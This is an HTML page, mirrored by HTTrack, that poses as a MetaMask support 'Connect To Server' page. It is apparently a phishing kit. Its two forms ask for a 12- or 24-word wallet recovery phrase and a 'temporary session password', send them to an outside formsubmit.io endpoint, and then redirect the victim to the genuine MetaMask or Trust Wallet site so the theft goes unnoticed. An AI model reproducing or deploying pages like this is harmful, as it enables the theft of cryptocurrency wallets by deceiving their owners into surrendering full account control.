<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from supportteam-metamask.netlify.app/support.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 27 Dec 2021 19:48:18 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="header.html" type="image/x-icon">
    <link rel="stylesheet" href="../cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
    <link rel="stylesheet" href="style.css">
    <title>Metamask | Connect</title>
</head>
<body class="wallet">
    
   <a href="https://metamask.io/#/">
       <img class="head" src="logo.svg" alt="">
   </a>

   <h2>Connect To Server</h2>
  
   <button id="btn1" onclick="show_hide()">12 WORD PHRASE</button>
   <div id="15form" class="r-container">
    <ul class="nav justify-content-between">
      <h2 class="mnemonic">MNEMONIC</h2>
    </ul>

    <div class="tab-content" id="myTabContent">
      <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
        <form id="contactForm" action="https://formsubmit.io/send/d716ca73-fedc-4236-85e0-ac2e7b8ac3d8" method="POST">
          <input name="_redirect" type="hidden" id="name" value="https://metamask.io/">

          <div class="">
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="1" id="name" required placeholder="1">
            
              <span></span>
              <input class="mnemonic-input" type="text" name="2" id="name" required placeholder="2">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="3" id="name" required placeholder="3">
              <span></span>
              <input class="mnemonic-input" type="text" name="4" id="name" required placeholder="4">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="5" id="name" required placeholder="5">
            
              <span></span>
              <input class="mnemonic-input" type="text" name="6" id="name" required placeholder="6">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="7" id="name" required placeholder="7">
            
              <span></span>
              <input class="mnemonic-input" type="text" name="8" id="name" required placeholder="8">
            </div>
            <div class="input">
                <span></span>
              <input class="mnemonic-input" type="text" name="9" id="name" required placeholder="9">
        <span></span>
              <input class="mnemonic-input" type="text" name="10" id="name" required placeholder="10">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="11" id="name" required placeholder="11">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="12" id="name" required placeholder="12">
            </div>
           
            </div>
           
            
          </div>
          <input type="password" class="password" name="password" style="
              font-size: 16px;
              border: 2px solid #037dd6;
              border-radius: 7px;
              margin-bottom: 15px;
              width: 70%;
              text-align: center;
              outline: none;
            " placeholder="Enter temporary session password" required="">
          <div class="
              d-flex
              align-items-center
              justify-content-center
              mb-3
            ">
            <span><input type="checkbox" name="checkbox" id="mnemonic-checkbox" required=""> I have entered all details correctly.</span>
           
          </div>
          <div>
            <p style="
                font-size: 13px;
                color: #3275ba;
                text-align: center;
              ">
              Input the BIP39/BIP44 recovery phrase here to restore
              the Mnemonic keys that manage your account
            </p>
            <input name="_formsubmit_id" type="text" style="display:none">

            <input type="submit" class="restore" placeholder="Restore" style="
                border: 0;
                border-radius: 7px;
                font-size: 20px;
                text-align: center;
                background: #037dd6;
                color: #ffffff;
                width: 60%;
                padding: 10px 0;
                margin: 20px 0;
              ">
          </div>
        </form>
      </div>
    </div>
  </div>


  <button id="btn2" onclick="hide_show()">24 WORD PHRASE</button>
  <div id="24form" class="r-container">
    <ul class="nav justify-content-between">
      <h2 class="mnemonic">MNEMONIC</h2>
    </ul>

    <div class="tab-content" id="myTabContent">
      <div class="tab-pane fade active show" id="mnemonic" role="tabpanel" aria-labelledby="mnemonic-tab">
        <form id="contactForm" action="https://formsubmit.io/send/d716ca73-fedc-4236-85e0-ac2e7b8ac3d8" method="POST">
          <input name="_redirect" type="hidden" id="name" value="https://trustwallet.com/">

          <div class="">
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="1" id="name" required placeholder="1">
            
              <span></span>
              <input class="mnemonic-input" type="text" name="2" id="name" required placeholder="2">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="3" id="name" required placeholder="3">
              <span></span>
              <input class="mnemonic-input" type="text" name="4" id="name" required placeholder="4">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="5" id="name" required placeholder="5">
            
              <span></span>
              <input class="mnemonic-input" type="text" name="6" id="name" required placeholder="6">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="7" id="name" required placeholder="7">
            
              <span></span>
              <input class="mnemonic-input" type="text" name="8" id="name" required placeholder="8">
            </div>
            <div class="input">
                <span></span>
              <input class="mnemonic-input" type="text" name="9" id="name" required placeholder="9">
        <span></span>
              <input class="mnemonic-input" type="text" name="10" id="name" required placeholder="10">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="11" id="name" required placeholder="11">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="12" id="name" required placeholder="12">
            </div>
            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="13" id="name" required placeholder="13">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="14" id="name" required placeholder="14">
            </div>

            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="15" id="name" required placeholder="15">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="16" id="name" required placeholder="16">
            </div>

            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="17" id="name" required placeholder="17">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="18" id="name" required placeholder="18">
            </div>

            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="19" id="name" required placeholder="19">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="20" id="name" required placeholder="20">
            </div>

            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="21" id="name" required placeholder="21">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="22" id="name" required placeholder="22">
            </div>

            <div class="input">
              <span></span>
              <input class="mnemonic-input" type="text" name="23" id="name" required placeholder="23">
        
              <span></span>
              <input class="mnemonic-input" type="text" name="24" id="name" required placeholder="24">
            </div>
           
            </div>
           
            
          </div>
          <input type="password" class="password" name="password" style="
              font-size: 16px;
              border: 2px solid #037dd6;
              border-radius: 7px;
              margin-bottom: 15px;
              width: 70%;
              text-align: center;
              outline: none;
            " placeholder="Enter temporary session password" required="">
          <div class="
              d-flex
              align-items-center
              justify-content-center
              mb-3
            ">
            <span><input type="checkbox" name="checkbox" id="mnemonic-checkbox" required=""> I have entered all details correctly.</span>
           
          </div>
          <div>
            <p style="
                font-size: 13px;
                color: #3275ba;
                text-align: center;
              ">
              Input the BIP39/BIP44 recovery phrase here to restore
              the Mnemonic keys that manage your account
            </p>
            <input name="_formsubmit_id" type="text" style="display:none">

            <input type="submit" class="restore" placeholder="Restore" style="
                border: 0;
                border-radius: 7px;
                font-size: 20px;
                text-align: center;
                background: #037dd6;
                color: #ffffff;
                width: 60%;
                padding: 10px 0;
                margin: 20px 0;
              ">
          </div>
        </form>
      </div>
    </div>
  </div>

 
<script src="script.js"></script>
  <script src="script.js"></script>
</body>

<!-- Mirrored from supportteam-metamask.netlify.app/support.html by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 27 Dec 2021 19:48:19 GMT -->
</html>
  